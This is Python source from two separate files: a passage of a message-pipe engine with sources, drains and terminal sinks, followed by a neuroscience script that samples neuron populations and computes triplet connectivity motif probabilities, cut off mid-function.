self.__fd_queue = collections.deque()
self.__fdr,self.__fdw = os.pipe()
self.thread = None
def __getattr__(self, attr):
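# Dynamic helper: engine.spawn_<PipeClassName>(...) instantiates the registered
# pipe class, adds it to the engine and returns it.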
if attr.startswith("spawn_"):
dname = attr[6:]
if dname in self.pipes:
def f(*args, **kargs):
k = self.pipes[dname]
p = k(*args, **kargs)
self.add(p)
return p
return f
raise AttributeError(attr)
def check_recv(self):
"""As select.select is not available, we check if there
is some data to read by using a list that stores pointers."""
return len(self.__fd_queue) > 0
def fileno(self):
return self.__fdr
def _read_cmd(self):
os.read(self.__fdr,1)
return self.__fd_queue.popleft()
def _write_cmd(self, _cmd):
self.__fd_queue.append(_cmd)
os.write(self.__fdw, b"X")
self.call_release()
def add_one_pipe(self, pipe):
self.active_pipes.add(pipe)
if isinstance(pipe, Source):
self.active_sources.add(pipe)
if isinstance(pipe, Drain):
self.active_drains.add(pipe)
if isinstance(pipe, Sink):
self.active_sinks.add(pipe)
def get_pipe_list(self, pipe):
def flatten(p, l):
l.add(p)
for q in p.sources|p.sinks|p.high_sources|p.high_sinks:
if q not in l:
flatten(q, l)
pl = set()
flatten(pipe, pl)
return pl
def _add_pipes(self, *pipes):
pl = set()
for p in pipes:
pl |= self.get_pipe_list(p)
pl -= self.active_pipes
for q in pl:
self.add_one_pipe(q)
return pl
def run(self):
log_interactive.info("Pipe engine thread started.")
try:
for p in self.active_pipes:
p.start()
sources = self.active_sources
sources.add(self)
exhausted = set([])
RUN=True
STOP_IF_EXHAUSTED = False
while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1):
fds = select_objects(sources, 2)
for fd in fds:
if fd is self:
cmd = self._read_cmd()
if cmd == "X":
RUN=False
break
elif cmd == "B":
STOP_IF_EXHAUSTED = True
elif cmd == "A":
sources = self.active_sources-exhausted
sources.add(self)
else:
warning("Unknown internal pipe engine command: %r. Ignoring." % cmd)
elif fd in sources:
try:
fd.deliver()
except Exception as e:
log_interactive.exception("piping from %s failed: %s" % (fd.name, e))
else:
if fd.exhausted():
exhausted.add(fd)
sources.remove(fd)
except KeyboardInterrupt:
pass
finally:
try:
for p in self.active_pipes:
p.stop()
finally:
self.thread_lock.release()
log_interactive.info("Pipe engine thread stopped.")
def start(self):
if self.thread_lock.acquire(0):
_t = Thread(target=self.run)
_t.setDaemon(True)
_t.start()
self.thread = _t
else:
warning("Pipe engine already running")
def wait_and_stop(self):
self.stop(_cmd="B")
def stop(self, _cmd="X"):
try:
with self.command_lock:
if self.thread is not None:
self._write_cmd(_cmd)
self.thread.join()
try:
self.thread_lock.release()
except:
pass
else:
warning("Pipe engine thread not running")
except KeyboardInterrupt:
print("Interrupted by user.")
def add(self, *pipes):
pipes = self._add_pipes(*pipes)
with self.command_lock:
if self.thread is not None:
for p in pipes:
p.start()
self._write_cmd("A")
def graph(self,**kargs):
g=['digraph "pipe" {',"\tnode [shape=rectangle];",]
for p in self.active_pipes:
g.append('\t"%i" [label="%s"];' % (id(p), p.name))
g.append("")
g.append("\tedge [color=blue, arrowhead=vee];")
for p in self.active_pipes:
for q in p.sinks:
g.append('\t"%i" -> "%i";' % (id(p), id(q)))
g.append("")
g.append("\tedge [color=purple, arrowhead=veevee];")
for p in self.active_pipes:
for q in p.high_sinks:
g.append('\t"%i" -> "%i";' % (id(p), id(q)))
g.append("")
g.append("\tedge [color=red, arrowhead=diamond];")
for p in self.active_pipes:
for q in p.trigger_sinks:
g.append('\t"%i" -> "%i";' % (id(p), id(q)))
g.append('}')
graph = "\n".join(g)
do_graph(graph, **kargs)
class _ConnectorLogic(object):
def __init__(self):
self.sources = set()
self.sinks = set()
self.high_sources = set()
self.high_sinks = set()
self.trigger_sources = set()
self.trigger_sinks = set()
def __lt__(self, other):
other.sinks.add(self)
self.sources.add(other)
return other
def __gt__(self, other):
self.sinks.add(other)
other.sources.add(self)
return other
def __eq__(self, other):
self > other
other > self
return other
def __lshift__(self, other):
self.high_sources.add(other)
other.high_sinks.add(self)
return other
def __rshift__(self, other):
self.high_sinks.add(other)
other.high_sources.add(self)
return other
def __floordiv__(self, other):
self >> other
other >> self
return other
def __xor__(self, other):
self.trigger_sinks.add(other)
other.trigger_sources.add(self)
return other
def __hash__(self):
return object.__hash__(self)
class _PipeMeta(type):
def __new__(cls, name, bases, dct):
c = type.__new__(cls, name, bases, dct)
PipeEngine.pipes[name] = c
return c
class Pipe(six.with_metaclass(_PipeMeta, _ConnectorLogic)):
def __init__(self, name=None):
_ConnectorLogic.__init__(self)
if name is None:
name = "%s" % (self.__class__.__name__)
self.name = name
def _send(self, msg):
for s in self.sinks:
s.push(msg)
def _high_send(self, msg):
for s in self.high_sinks:
s.high_push(msg)
def _trigger(self, msg=None):
for s in self.trigger_sinks:
s.on_trigger(msg)
def __repr__(self):
ct = conf.color_theme
s = "%s%s" % (ct.punct("<"), ct.layer_name(self.name))
if self.sources or self.sinks:
s+= " %s" % ct.punct("[")
if self.sources:
s+="%s%s" % (ct.punct(",").join(ct.field_name(s.name) for s in self.sources),
ct.field_value(">"))
s += ct.layer_name("#")
if self.sinks:
s+="%s%s" % (ct.field_value(">"),
ct.punct(",").join(ct.field_name(s.name) for s in self.sinks))
s += ct.punct("]")
if self.high_sources or self.high_sinks:
s+= " %s" % ct.punct("[")
if self.high_sources:
s+="%s%s" % (ct.punct(",").join(ct.field_name(s.name) for s in self.high_sources),
ct.field_value(">>"))
s += ct.layer_name("#")
if self.high_sinks:
s+="%s%s" % (ct.field_value(">>"),
ct.punct(",").join(ct.field_name(s.name) for s in self.high_sinks))
s += ct.punct("]")
if self.trigger_sources or self.trigger_sinks:
s+= " %s" % ct.punct("[")
if self.trigger_sources:
s+="%s%s" % (ct.punct(",").join(ct.field_name(s.name) for s in self.trigger_sources),
ct.field_value("^"))
s += ct.layer_name("#")
if self.trigger_sinks:
s+="%s%s" % (ct.field_value("^"),
ct.punct(",").join(ct.field_name(s.name) for s in self.trigger_sinks))
s += ct.punct("]")
s += ct.punct(">")
return s
class Source(Pipe, SelectableObject):
def __init__(self, name=None):
Pipe.__init__(self, name=name)
self.is_exhausted = False
def _read_message(self):
return Message()
def deliver(self):
msg = self._read_message()
self._send(msg)
def fileno(self):
return None
def check_recv(self):
return False
def exhausted(self):
return self.is_exhausted
def start(self):
pass
def stop(self):
pass
class Drain(Pipe):
"""Repeat messages from low/high entries to (resp.) low/high exits
+-------+
>>-|-------|->>
| |
>-|-------|->
+-------+
"""
def push(self, msg):
self._send(msg)
def high_push(self, msg):
self._high_send(msg)
def start(self):
pass
def stop(self):
pass
class Sink(Pipe):
def push(self, msg):
pass
def high_push(self, msg):
pass
def start(self):
pass
def stop(self):
pass
class AutoSource(Source, SelectableObject):
def __init__(self, name=None):
Source.__init__(self, name=name)
self.__fdr,self.__fdw = os.pipe()
self._queue = collections.deque()
def fileno(self):
return self.__fdr
def check_recv(self):
return len(self._queue) > 0
def _gen_data(self, msg):
self._queue.append((msg,False))
self._wake_up()
def _gen_high_data(self, msg):
self._queue.append((msg,True))
self._wake_up()
def _wake_up(self):
os.write(self.__fdw, b"X")
self.call_release()
def deliver(self):
os.read(self.__fdr,1)
try:
msg,high = self._queue.popleft()
except IndexError: #empty queue. Exhausted source
pass
else:
if high:
self._high_send(msg)
else:
self._send(msg)
class ThreadGenSource(AutoSource):
def __init__(self, name=None):
AutoSource.__init__(self, name=name)
self.RUN = False
def generate(self):
pass
def start(self):
self.RUN = True
Thread(target=self.generate).start()
def stop(self):
self.RUN = False
class ConsoleSink(Sink):
"""Print messages on low and high entries
+-------+
>>-|--. |->>
| print |
>-|--' |->
+-------+
"""
def push(self, msg):
print(">%r" % msg)
def high_push(self, msg):
print(">>%r" % msg)
class RawConsoleSink(Sink):
"""Print messages on low and high entries
+-------+
>>-|--. |->>
| write |
>-|--' |->
+-------+
"""
def __init__(self, name=None, newlines=True):
Sink.__init__(self, name=name)
self.newlines = newlines
self._write_pipe = 1
def push(self, msg):
if self.newlines:
msg += "\n"
os.write(self._write_pipe, msg.encode("utf8"))
def high_push(self, msg):
if self.newlines:
msg += "\n"
os.write(self._write_pipe, msg.encode("utf8"))
class CLIFeeder(AutoSource):
"""Send messages from python command line
+--------+
>>-| |->>
| send() |
>-| `----|->
+--------+
"""
def send(self, msg):
self._gen_data(msg)
def close(self):
self.is_exhausted = True
class CLIHighFeeder(CLIFeeder):
"""Send messages from python command line to high output
+--------+
>>-| .----|->>
| send() |
>-| |->
+--------+
"""
def send(self, msg):
self._gen_high_data(msg)
class PeriodicSource(ThreadGenSource):
"""Generage messages periodically on low exit
+-------+
>>-| |->>
| msg,T |
>-| `----|->
+-------+
"""
def __init__(self, msg, period, period2=0, name=None):
ThreadGenSource.__init__(self,name=name)
if not isinstance(msg, (list, set, tuple)):
msg=[msg]
self.msg = msg
self.period = period
self.period2 = period2
def generate(self):
while self.RUN:
empty_gen = True
for m in self.msg:
empty_gen = False
self._gen_data(m)
time.sleep(self.period)
if empty_gen:
self.is_exhausted = True
self._wake_up()
time.sleep(self.period2)
class TermSink(Sink):
"""Print messages on low and high entries on a separate terminal
+-------+
>>-|--. |->>
| print |
>-|--' |->
+-------+
"""
def __init__(self, name=None, keepterm=True, newlines=True, openearly=True):
Sink.__init__(self, name=name)
self.keepterm = keepterm
self.newlines = newlines
self.openearly = openearly
self.opened = False
if self.openearly:
self.start()
def _start_windows(self):
if not self.opened:
self.opened = True
self.__f = get_temp_file()
open(self.__f, "a").close()
self.name = "Scapy" if self.name is None else self.name
# Start a powershell in a new window and print the PID
cmd = "$app = Start-Process PowerShell -ArgumentList '-command &{$host.ui.RawUI.WindowTitle=\\\"%s\\\";Get-Content \\\"%s\\\" -wait}' -passthru; echo $app.Id" % (self.name, self.__f.replace("\\", "\\\\"))
proc = subprocess.Popen([conf.prog.powershell, cmd], stdout=subprocess.PIPE)
output, _ = proc.communicate()
# This is the process PID
self.pid = int(output)
print("PID: %d" % self.pid)
def _start_unix(self):
if not self.opened:
self.opened = True
rdesc, self.wdesc = os.pipe()
cmd = ["xterm"]
if self.name is not None:
cmd.extend(["-title",self.name])
if self.keepterm:
cmd.append("-hold")
cmd.extend(["-e", "cat <&%d" % rdesc])
self.proc = subprocess.Popen(cmd, close_fds=False)
os.close(rdesc)
def start(self):
if WINDOWS:
return self._start_windows()
else:
return self._start_unix()
def _stop_windows(self):
if not self.keepterm:
self.opened = False
# Recipe to kill process with PID
# http://code.activestate.com/recipes/347462-terminating-a-subprocess-on-windows/
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, self.pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
def _stop_unix(self):
if not self.keepterm:
self.opened = False
self.proc.kill()
self.proc.wait()
def stop(self):
if WINDOWS:
return self._stop_windows()
else:
return self._stop_unix()
def _print(self, s):
if self.newlines:
s+="\n"
if WINDOWS:
wdesc = open(self.__f, "a")
wdesc.write(s)
wdesc.close()
else:
os.write(self.wdesc, s.encode())
def push(self, msg):
self._print(str(msg))
def high_push(self, msg):
self._print(str(msg))
class QueueSink(Sink):
"""Collect messages from high and low entries and queue them. Messages are unqueued with the .recv() method.
+-------+
>>-|--. |->>
| queue |
>-|--' |->
+-------+
"""
def __init__(self, name=None):
Sink.__init__(self, name=name)
self.q = six.moves.queue.Queue()
def push(self, msg):
self.q.put(msg)
def high_push(self, msg):
self.q.put(msg)
def recv(self):
while True:
try:
return self.q.get(True, timeout=0.1)
except six.moves.queue.Empty:
pass
class TransformDrain(Drain):
"""Apply a function to messages on low and high entry
+-------+
>>-|--[f]--|->>
| |
>-|--[f]--|->
+-------+
"""
def __init__(self, f, name=None):
Drain.__init__(self, name=name)
self.f = f
def push(self, msg):
self._send(self.f(msg))
def high_push(self, msg):
self._high_send(self.f(msg))
class UpDrain(Drain):
"""Repeat messages from low entry to high exit
+-------+
>>-| ,--|->>
| / |
>-|--' |->
+-------+
"""
def push(self, msg):
self._high_send(msg)
def high_push(self, msg):
pass
class DownDrain(Drain):
"""Repeat messages from high entry to low exit
+-------+
>>-|--. |->>
| \ |
>-| `--|->
+-------+
"""
def push(self, msg):
pass
def high_push(self, msg):
self._send(msg)
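# Illustrative usage sketch (not part of the original module). The connector
# operators defined on _ConnectorLogic (">", ">>", "^") wire pipes together,
# and a PipeEngine then drives the sources. A minimal low-channel pipeline
# using only the classes defined above could be exercised like this:
#
#     fd = CLIFeeder()
#     td = TransformDrain(lambda msg: msg.upper())
#     cs = ConsoleSink()
#     fd > td > cs              # low entry -> low exit wiring
#     pe = PipeEngine(fd)       # picks up td and cs through the pipe graph
#     pe.start()
#     fd.send("hello")          # ConsoleSink prints >'HELLO'
#     fd.close()                # marks the source as exhausted
#     pe.wait_and_stop()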
|
eval_motifs.py | import os
import sys
import multiprocessing as mp
import numpy as np
import json
import traceback
import warnings
import util
import util_meta
import util_filter
import motif_combinations
import constants
import util_intersomatic_distance
def getMotifIndex_16():
return {
(0,0,0,0,0,0) : 16, # no edges
(1,0,0,0,0,0) : 15, # A -> B
(0,1,0,0,0,0) : 15, # B -> A
(0,0,1,0,0,0) : 15, # A -> C
(0,0,0,1,0,0) : 15, # C -> A
(0,0,0,0,1,0) : 15, # B -> C
(0,0,0,0,0,1) : 15, # C -> B
(1,1,0,0,0,0) : 14, # A <-> B
(0,0,1,1,0,0) : 14, # A <-> C
(0,0,0,0,1,1) : 14, # B <-> C
(1,0,0,0,1,0) : 13, # A -> B -> C
(0,0,1,0,0,1) : 13, # A -> C -> B
(0,1,1,0,0,0) : 13, # B -> A -> C
(0,0,0,1,1,0) : 13, # B -> C -> A
(1,0,0,1,0,0) : 13, # C -> A -> B
(0,1,0,0,0,1) : 13, # C -> B -> A
(1,0,1,0,0,0) : 12, # A -> B, C
(0,1,0,0,1,0) : 12, # B -> A, C
(0,0,0,1,0,1) : 12, # C -> A, B
(0,0,1,0,1,0) : 11, # A, B -> C
(1,0,0,0,0,1) : 11, # A, C -> B
(0,1,0,1,0,0) : 11, # B, C -> A
(1,1,0,1,0,0) : 10, # A <-> B; C -> A
(1,1,0,0,0,1) : 10, # A <-> B; C -> B
(0,1,1,1,0,0) : 10, # A <-> C; B -> A
(0,0,1,1,1,0) : 10, # A <-> C; B -> C
(1,0,0,0,1,1) : 10, # B <-> C; A -> B
(0,0,1,0,1,1) : 10, # B <-> C; A -> C
(1,1,1,0,0,0) : 9, # A <-> B; A -> C
(1,1,0,0,1,0) : 9, # A <-> B; B -> C
(1,0,1,1,0,0) : 9, # A <-> C; A -> B
(0,0,1,1,0,1) : 9, # A <-> C; C -> B
(0,1,0,0,1,1) : 9, # B <-> C; B -> A
(0,0,0,1,1,1) : 9, # B <-> C; C -> A
(1,1,1,1,0,0) : 8, # A <-> B; A <-> C
(1,1,0,0,1,1) : 8, # A <-> B; B <-> C
(0,0,1,1,1,1) : 8, # A <-> C; B <-> C
(1,0,0,1,1,0) : 7, # A -> B -> C -> A
(0,1,1,0,0,1) : 7, # A -> C -> B -> A
(1,0,1,0,1,0) : 6, # A -> B,C; B -> C
(1,0,1,0,0,1) : 6, # A -> B,C; C -> B
(0,1,1,0,1,0) : 6, # B -> A,C; A -> C
(0,1,0,1,1,0) : 6, # B -> A,C; C -> A
(1,0,0,1,0,1) : 6, # C -> A,B; A -> B
(0,1,0,1,0,1) : 6, # C -> A,B; B -> A
(1,1,1,0,0,1) : 5, # A <-> B; A -> C -> B
(1,1,0,1,1,0) : 5, # A <-> B; B -> C -> A
(1,0,1,1,1,0) : 5, # A <-> C; A -> B -> C
(0,1,1,1,0,1) : 5, # A <-> C; C -> B -> A
(0,1,1,0,1,1) : 5, # B <-> C; B -> A -> C
(1,0,0,1,1,1) : 5, # B <-> C; C -> A -> B
(1,1,0,1,0,1) : 4, # A <-> B; C -> A, B
(0,1,1,1,1,0) : 4, # A <-> C; B -> A, C
(1,0,1,0,1,1) : 4, # B <-> C; A -> B, C
(1,1,1,0,1,0) : 3, # A <-> B; A -> C; B -> C
(1,0,1,1,0,1) : 3, # A <-> C; A -> B; C -> B
(0,1,0,1,1,1) : 3, # B <-> C; B -> A; C -> A
(1,1,1,1,1,0) : 2, # A <-> B; A <-> C; B -> C
(1,1,1,1,0,1) : 2, # A <-> B; A <-> C; C -> B
(1,1,1,0,1,1) : 2, # A <-> B; B <-> C; A -> C
(1,1,0,1,1,1) : 2, # A <-> B; B <-> C; C -> A
(1,0,1,1,1,1) : 2, # A <-> C; B <-> C; A -> B
(0,1,1,1,1,1) : 2, # A <-> C; B <-> C; B -> A
(1,1,1,1,1,1) : 1 # A <-> B; A <-> C; B <-> C
}
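# Worked example of the encoding above: each key is the 6-tuple of directed
# edges (A->B, B->A, A->C, C->A, B->C, C->B). For instance (1,0,0,0,1,0) has
# the edges A->B and B->C, i.e. the chain A -> B -> C, and maps to motif
# class 13; adding the reciprocal edge C->B gives (1,0,0,0,1,1), i.e.
# B <-> C plus A -> B, which maps to class 10.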
def assertSumsToOne(probabilities, tolerance = 0.01):
summed = np.sum(list(probabilities.values()))
if(abs(summed - 1) > tolerance):
raise RuntimeError("summed probabilities: {:.12f}".format(summed))
def aggregateProbabilties_16(probabilities_64):
probabilities_16 = {}
for k in range(1, 17):
probabilities_16[k] = 0
motifIndex16 = getMotifIndex_16()
for maskKey, probability in probabilities_64.items():
motifNumber = motifIndex16[maskKey]
probabilities_16[motifNumber] += probability
assertSumsToOne(probabilities_16)
return probabilities_16
def removePopulationPrefix(combination):
if("#" in combination):
return combination.split("#")[0]
else:
return combination
def getPopulationsFromCombinations(combinations, mode):
nonredundantPopulations = set()
for combination in combinations:
nonredundantPopulations.add(removePopulationPrefix(combination[0]))
nonredundantPopulations.add(removePopulationPrefix(combination[1]))
nonredundantPopulations.add(removePopulationPrefix(combination[2]))
populations = [] # [(column, celltype/layer)]
for population in nonredundantPopulations:
parts = population.split("-")
column = parts[0]
celltypeLayer = parts[1]
populations.append((column, celltypeLayer))
return populations
def sampleIdsForPopulation(neurons, neuronsLayer, population, sampleSize):
column = population[0]
celltypeLayer = population[1]
filterSpec = util_filter.getDefaultFilter()
if(column in constants.getColumns()):
regions = constants.getRegionsForColumn(column, includeSurrounding=False)
filterSpec["region_whitelist"] = regions
elif(column == "ALL"):
pass
else:
raise ValueError(column)
if celltypeLayer in constants.getCellTypes():
celltype = celltypeLayer
if(celltype == "VPM"):
filterSpec["inside_vS1"] = []
filterSpec["celltype_whitelist"] = [celltype]
elif(celltypeLayer == "ALL"):
pass
elif(celltypeLayer == "EXC"):
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "INH"):
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L1"):
filterSpec["layer_whitelist"] = ["L1"]
elif(celltypeLayer == "L2"):
filterSpec["layer_whitelist"] = ["L2"]
elif(celltypeLayer == "L3"):
filterSpec["layer_whitelist"] = ["L3"]
elif(celltypeLayer == "L4"):
filterSpec["layer_whitelist"] = ["L4"]
elif(celltypeLayer == "L5"):
filterSpec["layer_whitelist"] = ["L5"]
elif(celltypeLayer == "L6"):
filterSpec["layer_whitelist"] = ["L6"]
elif(celltypeLayer == "L1EXC"):
filterSpec["layer_whitelist"] = ["L1"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L1INH"):
filterSpec["layer_whitelist"] = ["L2"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L2EXC"):
filterSpec["layer_whitelist"] = ["L2"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L2INH"):
filterSpec["layer_whitelist"] = ["L2"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L3EXC"):
filterSpec["layer_whitelist"] = ["L3"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L3INH"):
filterSpec["layer_whitelist"] = ["L3"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L4EXC"):
filterSpec["layer_whitelist"] = ["L4"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L4INH"):
filterSpec["layer_whitelist"] = ["L4"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L5EXC"):
filterSpec["layer_whitelist"] = ["L5"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L5INH"):
filterSpec["layer_whitelist"] = ["L5"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L6EXC"):
filterSpec["layer_whitelist"] = ["L6"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L6INH"):
filterSpec["layer_whitelist"] = ["L6"]
filterSpec["celltype_whitelist"] = ["INH"]
else:
raise ValueError(celltypeLayer)
nids = list(util_filter.filterNIDs(neurons, filterSpec, neuronsLayer=neuronsLayer))
nidsSampled = list(util.getRandomSubset(nids, sampleSize))
if(not len(nidsSampled)):
raise RuntimeError("empty sample: {}".format(population))
nids.sort()
nidsSampled.sort()
return nids, nidsSampled
def parseIntersomaticDistanceDescriptor(descriptor):
if("#" not in descriptor):
raise ValueError(descriptor)
parts = descriptor.split("#")
if(len(parts) != 4):
raise ValueError(descriptor)
populationDescriptor = parts[0]
partsPopulation = populationDescriptor.split("-")
column = partsPopulation[0]
celltypeLayer = partsPopulation[1]
population = (column, celltypeLayer)
distMin = float(parts[1])
distMax = float(parts[2])
distRange = (distMin, distMax)
return population, distRange
def sampleIntersomaticDistanceIds(networkDir, outfolder, combinations, sampleSize, numWorkers):
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
neuronsLayer = util_meta.loadNeuronsLayer(os.path.join(networkDir, "neurons_layer.csv"))
for combination in combinations:
A = combination[0]
B = combination[1]
C = combination[2]
population_A, distRange_A = parseIntersomaticDistanceDescriptor(A)
population_B, distRange_B = parseIntersomaticDistanceDescriptor(B)
population_C, distRange_C = parseIntersomaticDistanceDescriptor(C)
if(distRange_A != distRange_B or distRange_B != distRange_C):
raise RuntimeError("incompatible distances {}".format(combination))
distRange = distRange_A
nids_A, nids_sampled_A = sampleIdsForPopulation(neurons, neuronsLayer, population_A, sampleSize)
nids_B, nids_sampled_B = sampleIdsForPopulation(neurons, neuronsLayer, population_B, sampleSize)
nids_C, nids_sampled_C = sampleIdsForPopulation(neurons, neuronsLayer, population_C, sampleSize)
numTripletSamples = sampleSize**3
tripletSamples = util_intersomatic_distance.getTripletSamples(neurons, nids_A, nids_B, nids_C, distRange, numTripletSamples, numWorkers, numNeuronSubSamples=sampleSize)
filename = os.path.join(outfolder, "ids_{}_{}_{}.txt".format(A,B,C))
np.savetxt(filename, tripletSamples, fmt="%d", delimiter=",")
def sampleIds(networkDir, outfolder, mode, sampleSize, numWorkers):
if(mode == "celltype-combinations"):
combinations = motif_combinations.getCellTypeCombinations()
elif(mode == "celltype-layer-combinations"):
combinations = motif_combinations.getCellTypeLayerCombinations()
elif(mode == "all-column-combinations"):
combinations = motif_combinations.getAllColumnCombinations()
elif(mode == "selected-column-combinations"):
combinations = motif_combinations.getSelectedColumnCombinations()
elif(mode == "intersomatic-distance-combinations"):
combinations = motif_combinations.getIntersomaticDistanceCombinations()
sampleIntersomaticDistanceIds(networkDir, outfolder, combinations, sampleSize, numWorkers)
else:
raise ValueError(mode)
populations = getPopulationsFromCombinations(combinations, mode)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
neuronsLayer = util_meta.loadNeuronsLayer(os.path.join(networkDir, "neurons_layer.csv"))
for population in populations:
nids, nidsSampled = sampleIdsForPopulation(neurons, neuronsLayer, population, sampleSize)
column = population[0]
celltypeLayer = population[1]
filename = os.path.join(outfolder, "ids_{}-{}.txt".format(column, celltypeLayer))
np.savetxt(filename, nids, fmt="%d")
filenameSampled = os.path.join(outfolder, "ids_{}-{}_sampled.txt".format(column, celltypeLayer))
np.savetxt(filenameSampled, nidsSampled, fmt="%d")
def loadIds(idsFolder, descriptor, ignoreIdPostfix):
if("#" in descriptor and ignoreIdPostfix):
descriptor = descriptor.split("#")[0]
nids = np.loadtxt(os.path.join(idsFolder, "ids_{}.txt".format(descriptor)), dtype=int)
nidsSampled = np.loadtxt(os.path.join(idsFolder, "ids_{}_sampled.txt".format(descriptor)), dtype=int)
return nids, nidsSampled
def loadDependentIds(idsFolder, descriptorA, descriptorB, descriptorC):
filename = os.path.join(idsFolder, "ids_{}_{}_{}.txt".format(descriptorA, descriptorB, descriptorC))
nids = np.loadtxt(filename, delimiter=",", dtype=int)
nids_A = nids[:,0]
nids_B = nids[:,1]
nids_C = nids[:,2]
return nids_A, nids_B, nids_C
def loadDSC(networkDir, preIds, dscCache, descriptor, dscFolder):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UserWarning)
if(descriptor in dscCache):
return dscCache[descriptor]
dscFolder = os.path.join(networkDir, dscFolder)
dscPerPre = {}
for preId in preIds:
filename = os.path.join(dscFolder, "{}_DSC.csv".format(preId))
postIds, dscValues = util.loadDataBlock(filename,1)
dscPerPre[preId] = {
"postIds" : postIds,
"dscValues" : dscValues,
}
dscCache[descriptor] = dscPerPre
return dscPerPre
def loadDSCOnlineExperiment(networkDir, preIds, dscCache, dscFolder):
dscFolder = os.path.join(networkDir, dscFolder)
for preId in preIds:
if(preId not in dscCache.keys()):
filename = os.path.join(dscFolder, "{}_DSC.csv".format(preId))
postIds, dscValues = util.loadDataBlock(filename,1)
dscCache[preId] = {
"postIds" : postIds,
"dscValues" : dscValues,
}
def calcProbabilitiesSinglePreNeuron(postIds, dscPerPreNeuron):
dscMatched = np.zeros(postIds.size)
overlappingPostIds = dscPerPreNeuron["postIds"]
dscValues = dscPerPreNeuron["dscValues"]
common, idxOverlapping, idxMatched = np.intersect1d(overlappingPostIds, postIds, assume_unique=True, return_indices=True)
if(common.size):
dscMatched[idxMatched] = dscValues[idxOverlapping]
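# Convert the matched DSC values to connection probabilities. Assuming DSC is
# interpreted as an expected (Poisson) synapse count, 1 - exp(-DSC) below is
# the probability of at least one synapse between the pre/post pair; this
# reading is inferred from the formula, not stated explicitly in this file.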
p = 1-np.exp(-dscMatched)
return p
def calcProbabilties(preIds, postIds, dscPerPre):
probs = np.zeros(shape=(preIds.size, postIds.size))
for i in range(0, preIds.size):
preId = preIds[i]
dscPerPreNeuron = dscPerPre[preId]
probs[i,:] = calcProbabilitiesSinglePreNeuron(postIds, dscPerPreNeuron)
return probs
def getMotifMasks(numNodes):
nEdges = numNodes * (numNodes-1)
if(nEdges > 8):
raise ValueError(nEdges)
edgeConfigurations = np.arange(2**nEdges, dtype=np.uint8).reshape((-1,1))
masks = np.unpackbits(edgeConfigurations, axis=1)
masks_inv = np.ones_like(masks) - masks
masks = masks.astype(bool)
masks_inv = masks_inv.astype(bool)
return masks[:,(8-nEdges):], masks_inv[:,(8-nEdges):]
def calcMotifProbability(p, p_inv, mask, mask_inv):
p_edges = np.concatenate((p[:,mask], p_inv[:,mask_inv]), axis=1)
p_motif = np.prod(p_edges, axis=1)
return np.mean(p_motif)
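# Illustrative sketch (not part of the original module): getMotifMasks(3)
# enumerates all 2**6 = 64 directed-edge configurations of a neuron triplet
# as boolean masks over the edge order (A-B, B-A, A-C, C-A, B-C, C-B).
# Given an (n_samples, 6) matrix p of edge probabilities and p_inv = 1 - p,
# the probability of a specific motif is the product of "edge present"
# probabilities for the masked edges and "edge absent" probabilities for the
# rest, averaged over samples:
#
#     masks, masks_inv = getMotifMasks(3)
#     p_inv = 1 - p
#     p_fully_connected = calcMotifProbability(p, p_inv, masks[-1], masks_inv[-1])
#
# masks[-1] is the all-ones row (every edge present), so this yields the mean
# probability that all six directed connections exist.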
def calcModelProbabilitiesIndependentSamples(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C):
num_A = nids_A_sample.size
num_B = nids_B_sample.size
num_C = nids_C_sample.size
numSamples = num_A * num_B * num_C
p_model = np.zeros(shape=(numSamples, 6))
p_A_B = calcProbabilties(nids_A_sample, nids_B_sample, dsc_A)
p_B_A = calcProbabilties(nids_B_sample, nids_A_sample, dsc_B)
p_A_C = calcProbabilties(nids_A_sample, nids_C_sample, dsc_A)
p_C_A = calcProbabilties(nids_C_sample, nids_A_sample, dsc_C)
p_B_C = calcProbabilties(nids_B_sample, nids_C_sample, dsc_B)
p_C_B = calcProbabilties(nids_C_sample, nids_B_sample, dsc_C)
p_all = np.concatenate((p_A_B, p_B_A, p_A_C, p_C_A, p_B_C, p_C_B), axis=None)
stats["avg_A-B"] = np.mean(p_A_B)
stats["sd_A-B"] = np.std(p_A_B)
stats["avg_B-A"] = np.mean(p_B_A)
stats["sd_B-A"] = np.std(p_B_A)
stats["avg_A-C"] = np.mean(p_A_C)
stats["sd_A-C"] = np.std(p_A_C)
stats["avg_C-A"] = np.mean(p_C_A)
stats["sd_C-A"] = np.std(p_C_A)
stats["avg_B-C"] = np.mean(p_B_C)
stats["sd_B-C"] = np.std(p_B_C)
stats["avg_C-B"] = np.mean(p_C_B)
stats["sd_C-B"] = np.std(p_C_B)
stats["avg_all"] = np.mean(p_all)
stats["sd_all"] = np.std(p_all)
idx = 0
for i in range(0, num_A):
for j in range(0, num_B):
for k in range(0, num_C):
if(i == j or i == k or j == k):
p_model[idx, :] = 0
else:
p_model[idx, 0] = p_A_B[i,j]
p_model[idx, 1] = p_B_A[j,i]
p_model[idx, 2] = p_A_C[i,k]
p_model[idx, 3] = p_C_A[k,i]
p_model[idx, 4] = p_B_C[j,k]
p_model[idx, 5] = p_C_B[k,j]
idx += 1
return p_model
def calcProbilityAll(nids_A, nids_B, nids_C, p_model):
